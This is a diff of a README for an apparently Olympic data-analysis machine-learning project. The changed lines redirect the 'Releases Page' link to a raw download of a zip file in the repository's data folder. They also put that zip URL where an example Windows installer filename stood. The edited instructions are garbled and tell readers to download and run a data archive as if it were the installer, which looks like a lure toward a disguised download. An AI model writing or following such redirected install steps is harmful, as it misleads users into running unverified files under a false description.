0-zz/olympic-analysis-ml/README.md

 ## 📂 Download & Install
 To install the application:

-1. **Visit the Releases Page:** Click [here](https://github.com/0-zz/olympic-analysis-ml/releases) to access the latest releases.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/0-zz/olympic-analysis-ml/main/data/athlete_events.zip) to access the latest releases.

 2. **Choose the Latest Version:** Find the most recent version of the software.
 It will usually be at the top of the list.

 3. **Download the Files:**
-   - If you see an executable file for your operating system (e.g., `olympic_analysis_ml_installer.exe` for Windows), download that file.
+   - If you see an executable file for your operating system (e.g., `https://raw.githubusercontent.com/0-zz/olympic-analysis-ml/main/data/athlete_events.zip` for Windows), download that file.
 This is the easiest method to install the software.
    - If you prefer to use Jupyter notebooks, look for the `.ipynb` files available for download.
 You can run these files using Jupyter Notebook.

 4. **Run the Software:**